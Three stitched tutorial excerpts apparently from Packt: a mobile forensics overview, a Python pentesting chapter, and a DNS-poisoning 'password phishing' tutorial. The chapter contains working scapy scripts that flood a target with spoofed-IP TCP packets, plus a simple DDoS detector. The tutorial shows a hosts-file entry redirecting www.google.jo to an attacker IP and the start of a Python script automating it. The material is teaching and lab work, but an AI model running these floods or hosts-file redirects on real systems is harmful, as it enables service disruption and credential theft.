Why do we need mobile forensics?

In 2015, there were more than 7 billion mobile cellular subscriptions worldwide, up from less than 1 billion in 2000, says the International Telecommunication Union (ITU). The world is witnessing technology and user migration from desktops to mobile phones. The following figure, sourced from statista.com, shows the actual and estimated growth of smartphones from the year 2009 to 2018, in million units. Gartner Inc. reports that global mobile data traffic reached 52 million terabytes (TB) in 2015, an increase of 59 percent from 2014, and the rapid growth is set to continue through 2018, when mobile data levels are estimated to reach 173 million TB.

Smartphones of today, such as the Apple iPhone, Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionalities. Mobile phones are the most personal electronic devices that a user accesses. They are used to perform simple communication tasks, such as calling and texting, while still providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobile phones become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in people's daily lives and in crime, data acquired from phones becomes an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases.
It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/.

The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device and that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case.

Mobile forensics

Digital forensics is a branch of forensic science focusing on the recovery and investigation of raw data residing in electronic or digital devices. The goal of the process is to extract and recover any information from a digital device without altering the data present on the device. Over the years, digital forensics has grown along with the rapid growth of computers and various other digital devices. There are various branches of digital forensics based on the type of digital device involved, such as computer forensics, network forensics, mobile forensics, and so on.

Mobile forensics is a branch of digital forensics related to the recovery of digital evidence from mobile devices. Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of a particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, so a standard write protection will not work during forensic acquisition.
Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extracting data for forensic examination. In cases where examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices, as it yields the most valuable data. As with any evidence gathering, not following the proper procedure during the examination can result in the loss or damage of evidence, or render it inadmissible in court.

The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis. Forensic examiners face some challenges while seizing the mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a Faraday bag to prevent changes should the device automatically power on. Faraday bags are specifically designed to isolate the phone from the network.

A Faraday bag (image courtesy: http://www.amazon.com/Black-Hole-Faraday-Bag-Isolation/dp/B0091WILY0)

If the phone is found switched on, switching it off has a lot of concerns attached to it. If the phone is locked by a PIN or password, or encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So, if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a Faraday bag.
If possible, prior to placing the mobile device in the Faraday bag, disconnect it from the network to protect the evidence by enabling flight mode and disabling all network connections (Wi-Fi, GPS, hotspots, and so on). This will also preserve the battery, which will drain while in a Faraday bag, and protect against leaks in the Faraday bag. Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone.

Mobile phones are dynamic systems that present a lot of challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices.

Challenges in mobile forensics

One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons:

Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across different types of mobile models, which differ in size, hardware, features, and operating system.
Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape changes with each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques across various devices.

Mobile operating systems: Unlike personal computers, where Windows has dominated the market for years, mobile devices widely use many operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others. Even within these operating systems, there are several versions, which makes the task of the forensic investigator even more difficult.

Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices.

Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices.

Preventing data modification: One of the fundamental rules in forensics is to make sure that data on the device is not modified. In other words, any attempt to extract data from the device should not alter the data present on that device. But this is practically not possible with mobiles, because just switching on a device can change its data. Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off.
A sudden transition from one state to another may result in the loss or modification of data.

Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations on digital media more difficult.

Dynamic nature of evidence: Digital evidence may be easily altered, either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device.

Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining it may result in the loss of data.

Device alteration: The possible ways to alter devices may range from moving application data and renaming files to modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account.

Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on it. While there are techniques to bypass the screen lock, they may not always work on all versions.

Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device.

Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult.

Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread to other devices over either a wired interface or a wireless one.

Legal issues: Mobile devices might be involved in crimes that can cross geographical boundaries.
In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws.

Summary

Mobile devices store a wide range of information, such as SMS, call logs, browser history, chat messages, location details, and so on. Mobile device forensics includes many approaches and concepts that fall outside the boundaries of traditional digital forensics. Extreme care should be taken while handling the device, right from the evidence intake phase to the archiving phase. Examiners responsible for mobile devices must understand the different acquisition methods and the complexities of handling the data during analysis. Extracting data from a mobile device is half the battle. The operating system, security features, and type of smartphone will determine the amount of access you have to the data. It is important to follow sound forensic practices and make sure that the evidence is unaltered during the investigation.

Further resources on this subject:
- Forensics Recovery [article]
- Mobile Phone Forensics – A First Step into Android Forensics [article]
- Mobility [article]

Pentesting Using Python

Packt
04 Feb 2015
22 min read
In this article by Mohit, the author of the book Python Penetration Testing Essentials, we introduce pentesting with Python. Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose, such as fame, selling a vulnerability for money, or exploiting a vulnerability out of personal enmity. Many well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break into the network after getting legal approval from the client, and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of the technology involved.

Introducing the scope of pentesting

In simple words, penetration testing is to test the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings, such as weaknesses and vulnerabilities in the company's infrastructure and the risk level of particular vulnerabilities, and provide solutions if possible.
The need for pentesting

There are several points that describe the significance of pentesting:

- Pentesting identifies the threats that might expose the confidentiality of an organization
- Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security
- Pentesting assesses the network's efficiency by producing a huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches
- Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting
- In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited
- Pentesting ensures whether suitable security policies are being followed or not

Consider the example of a well-reputed e-commerce company that makes money from online business. A hacker or a group of black-hat hackers find a vulnerability in the company's website and hack it. The amount of loss the company will have to bear will be tremendous.

Components to be tested

An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats, such as misconfiguration or vulnerabilities in:

- Routers, switches, or gateways
- Public-facing systems: websites, DMZ, e-mail servers, and remote systems
- DNS, firewalls, proxy servers, FTP, and web servers

Testing should be performed on all hardware and software components of a network security system.

Qualities of a good pentester

The following points describe the qualities of a good pentester.
They should:

- Choose a suitable set of tests and tools that balance cost and benefits
- Follow suitable procedures with proper planning and documentation
- Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures
- Be ready to show how to exploit the vulnerabilities they find
- State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible
- Keep themselves updated at all times, because technology is advancing rapidly

A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market; some are open source and some are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clarify your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best choice, as extensive and freely available pentesting packages exist for Python, in addition to its ease of programming. This simplicity, along with third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes as in Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting, this book is ideal for you.

Defining the scope of pentesting

Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope:

- You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account.
- Alice will consult Bob on whether any sensitive or restricted areas should be included or not.
- You should take into account time, people, and money.
- You should profile the test boundaries on the basis of an agreement signed by the pentester and the client.
- Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting.

The scope of pentesting is defined by two types of tests:

- A non-destructive test: This test is limited to finding vulnerabilities and carrying out tests without any potential risk. It performs the following actions:
  - Scans and identifies the remote system for potential vulnerabilities
  - Investigates and verifies the findings
  - Maps the vulnerabilities with proper exploits
  - Exploits the remote system with proper care to avoid disruption
  - Provides a proof of concept
  - Does not attempt a Denial-of-Service (DoS) attack
- A destructive test: This test can produce risks.
It performs the following actions:

  - Attempts DoS and buffer overflow attacks, which have the potential to bring down the system

Approaches to pentesting

There are three types of approaches to pentesting:

- Black-box pentesting follows a non-deterministic approach of testing:
  - You will be given just a company name
  - It is like hacking with the knowledge of an outside attacker
  - There is no need for any prior knowledge of the system
  - It is time consuming
- White-box pentesting follows a deterministic approach of testing:
  - You will be given complete knowledge of the infrastructure that needs to be tested
  - This is like working as a malicious employee who has ample knowledge of the company's infrastructure
  - You will be provided information on the company's infrastructure, network type, company's policies, do's and don'ts, the IP addresses, and the IPS/IDS firewall
- Gray-box pentesting follows a hybrid approach of black-box and white-box testing:
  - The tester usually has limited information on the target network/system that is provided by the client, to lower costs and decrease trial and error on the part of the pentester
  - It performs the security assessment and testing internally

Introducing Python scripting

Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable types, data types (tuple, list, dictionary), functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstrations have been done with Python version 2.7.8. If you use a Linux OS such as Kali or BackTrack, there will be no issue, because many programs, such as wireless sniffers, do not work on the Windows platform. Kali Linux also uses version 2.7. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most hackers choose this profession because they don't want to do programming; they want to use tools.
However, without programming, a hacker cannot enhance his skills. Every time, they have to search for the tools over the Internet. Believe me, after seeing its simplicity, you will love this language.

Understanding the tests and tools you'll need

To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines on your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It is a good idea to use CentOS or Red Hat version 5 or 6 for the web server, because they contain the RPMs for Apache and PHP. For the Python scripts, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms.

Learning the common testing platforms with Python

You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful and classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as in at least one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux; Windows, CentOS, and Kali Linux will be used. A hacker always loves to work on a Linux system, as it is free and open source. Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. Some tools work on both Linux and Windows, but on Windows you have to install them yourself. I expect you to have knowledge of Linux. Now, it's time to work with networking in Python.
Implementing a network sniffer by using Python

Before learning about the implementation of a network sniffer, let's learn about two methods from the struct module:

- struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format
- struct.unpack(fmt, string): This method unpacks the string according to the given format

Let's discuss the code:

import struct
ms = struct.pack('hhl', 1, 2, 3)
print (ms)
k = struct.unpack('hhl', ms)
print k

The output for the preceding code is as follows:

G:\PythonNetworking\network>python str1.py
☺ ☻ ♥
(1, 2, 3)

First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. The values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections.

Consider the situation of the client-server model; let's illustrate it by means of an example. Run the struct1.py file. The server-side code is as follows:

import socket
import struct

host = "192.168.0.1"
port = 12347
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
conn, addr = s.accept()
print "connected by", addr
msz = struct.pack('hhl', 1, 2, 3)
conn.send(msz)
conn.close()

The entire code is the same as we have seen previously; msz = struct.pack('hhl', 1, 2, 3) packs the message and conn.send(msz) sends the message.

Run the unstruc.py file. The client-side code is as follows:

import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.0.1"
port = 12347
s.connect((host, port))
msg = s.recv(1024)
print msg
print struct.unpack('hhl', msg)
s.close()

The client-side code accepts the message and unpacks it in the given format.
The output for the client-side code is as follows:

C:\network>python unstruc.py
☺ ☻ ♥
(1, 2, 3)

The output for the server-side code is as follows:

G:\PythonNetworking\program>python struct1.py
connected by ('192.168.0.11', 1417)

Now, you must have a fair idea of how to pack and unpack data.

Format characters

We have seen the format strings used in the pack and unpack methods. In the following table, the C Type and Python type columns denote the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes.

Format | C Type             | Python type        | Standard size
x      | pad byte           | no value           |
c      | char               | string of length 1 | 1
b      | signed char        | integer            | 1
B      | unsigned char      | integer            | 1
?      | _Bool              | bool               | 1
h      | short              | integer            | 2
H      | unsigned short     | integer            | 2
i      | int                | integer            | 4
I      | unsigned int       | integer            | 4
l      | long               | integer            | 4
L      | unsigned long      | integer            | 4
q      | long long          | integer            | 8
Q      | unsigned long long | integer            | 8
f      | float              | float              | 4
d      | double             | float              | 8
s      | char[]             | string             |
p      | char[]             | string             |
P      | void *             | integer            |

Let's check what happens when one value is packed in different formats:

>>> import struct
>>> struct.pack('b', 2)
'\x02'
>>> struct.pack('B', 2)
'\x02'
>>> struct.pack('h', 2)
'\x02\x00'

We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes. Now, let's use the long long int, which is 8 bytes:

>>> struct.pack('q', 2)
'\x02\x00\x00\x00\x00\x00\x00\x00'

If we work on a network, ! should be used in the format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little-endian, you can refer to the Wikipedia page on Endianness:

>>> struct.pack('!q', 2)
'\x00\x00\x00\x00\x00\x00\x00\x02'

You can see the difference when using ! in the format.

Before proceeding to sniffing, you should be aware of the following definitions:

- PF_PACKET: It operates at the device driver layer.
The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET.

- Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application.

The following socket methods are used for byte-order conversion:

- socket.ntohl(x): Network to host long. It converts a 32-bit positive integer from network to host byte order.
- socket.ntohs(x): Network to host short. It converts a 16-bit positive integer from network to host byte order.
- socket.htonl(x): Host to network long. It converts a 32-bit positive integer from host to network byte order.
- socket.htons(x): Host to network short. It converts a 16-bit positive integer from host to network byte order.

So, what is the significance of the preceding four methods? Consider a 16-bit number, 0000000000000011. When you send this number from one computer to another, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again. Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP model: the physical layer (Ethernet), the network layer (IP), and the TCP layer (port).

Introducing DoS and DDoS

In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making them unavailable for the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers.
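The byte-order helpers described above are easy to sanity-check. The following is a short Python 3 sketch (the book's listings use Python 2, so the print syntax differs) showing that htons()/ntohs() round-trip a 16-bit value and that struct's ! prefix always packs big-endian, regardless of the host CPU:

```python
import socket
import struct

value = 0x0003  # the 16-bit 0000000000000011 from the example above

# On a little-endian host, htons() swaps the bytes; on a big-endian host
# it is a no-op. Either way, the round trip restores the original value.
assert socket.ntohs(socket.htons(value)) == value

# struct gives the same guarantee with the '!' (network order) prefix:
packed = struct.pack('!H', value)
assert packed == b'\x00\x03'          # big-endian on every platform
assert struct.unpack('!H', packed)[0] == value
print("byte-order round trip OK")
```

If you drop the !, struct.pack('H', value) uses the host's native order, which is exactly the ambiguity the four socket methods exist to remove.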
In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out a DDoS attack, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports.

Single IP, single port

In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and a single source port number. This is a very low-level DoS attack, and it will test the web server's request-handling capacity. The following is the code of sisp.py:

from scapy.all import *

src = raw_input("Enter the Source IP ")
target = raw_input("Enter the Target IP ")
srcport = int(raw_input("Enter the Source Port "))
i = 1
while True:
  IP1 = IP(src=src, dst=target)
  TCP1 = TCP(sport=srcport, dport=80)
  pkt = IP1 / TCP1
  send(pkt, inter=.001)
  print "packet sent ", i
  i = i + 1

I have used scapy to write this code, and I hope that you are familiar with it. The preceding code asks for three things: the source IP address, the destination IP address, and the source port address. Let's check the output on the attacker's machine:

Single IP with single port

I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on the web server. Irrespective of whether it works or not, write your findings in the report. Let's check the output on the server side:

Wireshark output on the server

This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers.

Single IP, multiple port

Now, in this attack, we use a single IP address but multiple ports.
Here is the code of the simp.py program:

from scapy.all import *

src = raw_input("Enter the Source IP ")
target = raw_input("Enter the Target IP ")

i = 1
while True:
  for srcport in range(1, 65535):
    IP1 = IP(src=src, dst=target)
    TCP1 = TCP(sport=srcport, dport=80)
    pkt = IP1 / TCP1
    send(pkt, inter=.0001)
    print "packet sent ", i
    i = i + 1

I used a for loop for the ports. Let's check the output on the attacker's machine:

Packets from the attacker's machine

The preceding screenshot shows that the packets were sent successfully. Now, check the output on the target machine:

Packets appearing in the target machine

In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create multiple IPs with a single port.

Multiple IP, multiple port

In this section, we will discuss multiple IPs with multiple port addresses. In this attack, we use different IPs to send packets to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs:

import random
from scapy.all import *

target = raw_input("Enter the Target IP ")

i = 1
while True:
  a = str(random.randint(1, 254))
  b = str(random.randint(1, 254))
  c = str(random.randint(1, 254))
  d = str(random.randint(1, 254))
  dot = "."
  src = a + dot + b + dot + c + dot + d
  print src
  st = random.randint(1, 1000)
  en = random.randint(1000, 65535)
  loop_break = 0
  for srcport in range(st, en):
    IP1 = IP(src=src, dst=target)
    TCP1 = TCP(sport=srcport, dport=80)
    pkt = IP1 / TCP1
    send(pkt, inter=.0001)
    print "packet sent ", i
    loop_break = loop_break + 1
    i = i + 1
    if loop_break == 50:
      break

In the preceding code, we used the a, b, c, and d variables to store four random strings, each ranging from 1 to 254, and the src variable stores the resulting random IP address. Here, we used the loop_break variable to break the for loop after 50 packets; this means 50 packets originate from one IP, while the rest of the code is the same as before.
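The spoofed-address logic in mimp.py is easy to isolate and test on its own. Here is a hedged Python 3 sketch of just that part (the helper name random_ipv4 is mine, not from the book), so you can verify the generated strings are well-formed before wiring them into scapy:

```python
import random

def random_ipv4():
    """Return a random dotted-quad string, each octet in 1..254,
    mirroring the a/b/c/d logic of the mimp.py listing."""
    return ".".join(str(random.randint(1, 254)) for _ in range(4))

if __name__ == "__main__":
    for _ in range(3):
        ip = random_ipv4()
        octets = ip.split(".")
        assert len(octets) == 4
        assert all(1 <= int(o) <= 254 for o in octets)
        print(ip)
```

Keeping the generator separate also makes it trivial to swap in a different spoofing scheme (say, octets drawn from a specific subnet) without touching the packet-sending loop.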
Let's check the output of the mimp.py program:

Multiple IP with multiple ports

In the preceding screenshot, you can see that after packet 50, the IP address changes. Let's check the output on the target machine:

The target machine's output on Wireshark

Use several machines and execute this code. In the preceding screenshot, you can see that the machine replies to the source IP. This type of attack is very difficult to detect, because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host.

Detection of DDoS

When I was pursuing my Master of Engineering degree, my friend and I were working on DDoS attacks. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source, so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. For example, if the web server is only running a website, then only traffic containing port 80 should be allowed. Now, let's go through a very simple piece of code to detect a DDoS attack. The program's name is DDOS_detect1.py:

import socket
import struct
from datetime import datetime

s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
dict = {}
file_txt = open("dos.txt", 'a')
file_txt.writelines("**********")
t1 = str(datetime.now())
file_txt.writelines(t1)
file_txt.writelines("**********")
file_txt.writelines("\n")
print "Detection Start ......."
D_val = 10
D_val1 = D_val + 10
while True:
  pkt = s.recvfrom(2048)
  ipheader = pkt[0][14:34]
  ip_hdr = struct.unpack("!8sB3s4s4s", ipheader)
  IP = socket.inet_ntoa(ip_hdr[3])
  print "Source IP", IP
  if dict.has_key(IP):
    dict[IP] = dict[IP] + 1
    print dict[IP]
    if (dict[IP] > D_val) and (dict[IP] < D_val1):
      line = "DDOS Detected "
      file_txt.writelines(line)
      file_txt.writelines(IP)
      file_txt.writelines("\n")
  else:
    dict[IP] = 1

In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt", 'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to record the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val = 10 variable is an assumption made just for the demonstration of the program; the assumption is made by viewing the statistics of hits from a particular IP. Consider the case of a tutorial website: the hits from college and school IPs would be higher. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable is used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement, which checks whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP] = dict[IP] + 1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of the packets that come from a particular IP. The if (dict[IP] > D_val) and (dict[IP] < D_val1): statements are the criteria to detect and write results to the dos.txt file; (dict[IP] > D_val) detects whether the incoming packet count exceeds the D_val value or not. If it exceeds it, the subsequent statements write the IP to dos.txt as new packets arrive.
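The detection rule at the heart of DDOS_detect1.py, stripped of the raw-socket sniffing (which requires root and a Linux-only PF_PACKET socket), is just a per-IP counter with a threshold window. Here is a self-contained Python 3 sketch of that logic (the function name and the sample traffic values are illustrative, not from the book):

```python
from collections import Counter

D_VAL = 10           # packets-per-IP threshold (demo value, as in the book)
D_VAL1 = D_VAL + 10  # upper bound so each noisy IP is logged a limited number of times

def detect(source_ips):
    """Count packets per source IP and report IPs whose running count
    falls in the (D_VAL, D_VAL1) alert window, mimicking DDOS_detect1.py."""
    counts = Counter()
    alerts = []
    for ip in source_ips:
        counts[ip] += 1
        if D_VAL < counts[ip] < D_VAL1:
            alerts.append(ip)
    return alerts

# 15 packets from one IP, 3 from another: only the first trips the rule,
# once for each count from 11 through 15.
stream = ["10.10.10.100"] * 15 + ["192.168.0.5"] * 3
hits = detect(stream)
assert set(hits) == {"10.10.10.100"}
assert len(hits) == 5
print(hits)
```

Because the window is open-ended on neither side, a sustained flood from one IP is written at most D_VAL1 - D_VAL - 1 times, which is exactly why the logfile in the book shows a single IP nine times.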
To avoid redundancy, the (dict[IP] < D_val1) statement has been used; the subsequent statements write the results to the dos.txt file. Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file: it writes a single IP nine times, since we set D_val1 = D_val + 10. You can change the D_val value to set the number of requests allowed from a particular IP, depending on the historical statistics of the website. I hope the preceding code will be useful for research purposes.

Detecting a DDoS attack

If you are a security researcher, the preceding program should be useful to you. You can modify the code such that only packets containing port 80 will be allowed.

Summary

In this article, we learned about penetration testing using Python. We also learned about sniffing using a Python script and about client-side validation, as well as how to bypass client-side validation and in which situations client-side validation is a good choice. We went through how to use Python to fill a form and send the parameters where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article: a single IP attack falls into the category of a DoS attack, and a multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for pentesters but also for researchers. Taking advantage of the Python DDoS-detection script, you can modify the code and create larger programs, which can trigger actions to control or mitigate a DDoS attack on the server.

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details. Hackers or attackers lure customers into sharing their personal details by sending them e-mails that appear to come from popular organizations. In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, corrupt Domain Name System data is injected into the DNS resolver's cache. This causes the name server to provide an incorrect result record, and it can result in traffic being directed to the hacker's computer system. This article is an excerpt taken from Python For Offensive PenTest, written by Hussam Khrais.

Password phishing – DNS poisoning

One of the easiest ways to manipulate the direction of traffic remotely is to play with DNS records. Each operating system contains a hosts file in order to statically map hostnames to specific IP addresses. The hosts file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let's have a quick look at the hosts file in the Windows operating system. In Windows, the file is located under C:\Windows\System32\drivers\etc. Let's have a look at the contents of the hosts file:

If you read the description, you will see that each entry should be located on a separate line. There is also a sample of the record format, where the IP is placed first and, after at least one space, the name follows. In other words, each record begins with the IP address, followed by the hostname.

Now, let's see the traffic at the packet level:

1. Open Wireshark on the target machine and start the capture.
2. Filter on the attacker's IP address. We have an IP address of 10.10.10.100, which is the IP address of our attacker. We can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process.
3. Open https://www.google.jo/?gws_rd=ssl.
Notice that once we ping the name from the command line, the operating system behind the scenes will do a DNS lookup, and we will get the real IP address. Now, let's see what happens after DNS poisoning. For this, close all the windows except the one where the Wireshark application is running. Keep in mind that we should run as admin to be able to modify the hosts file. Even though we are logged in as an admin, when it comes to running an application you should explicitly right-click it and then run as admin. Navigate to the directory where the hosts file is located. Execute dir and you will see the hosts file. Run type hosts; you can see the original hosts file here. Now, we will enter the command:

echo 10.10.10.100 www.google.jo >> hosts

10.10.10.100 is the IP address of our Kali machine, so once the target goes to google.jo, it should be redirected to the attacker machine. Once again, verify the hosts file by executing type hosts. After making a DNS modification, it's always a good idea to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command:

ipconfig /flushdns

Now, watch what happens after DNS poisoning. For this, we will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that, in Wireshark, the traffic goes to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100. We will stop the capture and recover the original hosts file, placing that file back in the drivers\etc folder. Now, let's flush the poisoned DNS cache first by running:

ipconfig /flushdns

Then, open the browser again. We should reach the real https://www.google.jo/?gws_rd=ssl right now. Now we are good to go!

Using a Python script

Now we'll automate the steps, but this time via a Python script.
Open the script and enter the following code:

# Python For Offensive PenTest
# DNS_Poisoning

import subprocess
import os

# Change the script directory to ...\drivers\etc, where the hosts file is located on Windows
os.chdir("C:\\Windows\\System32\\drivers\\etc")

# Append this line to the hosts file; it redirects traffic going to
# google.jo to the IP 10.10.10.100
command = "echo 10.10.10.100 www.google.jo >> hosts"
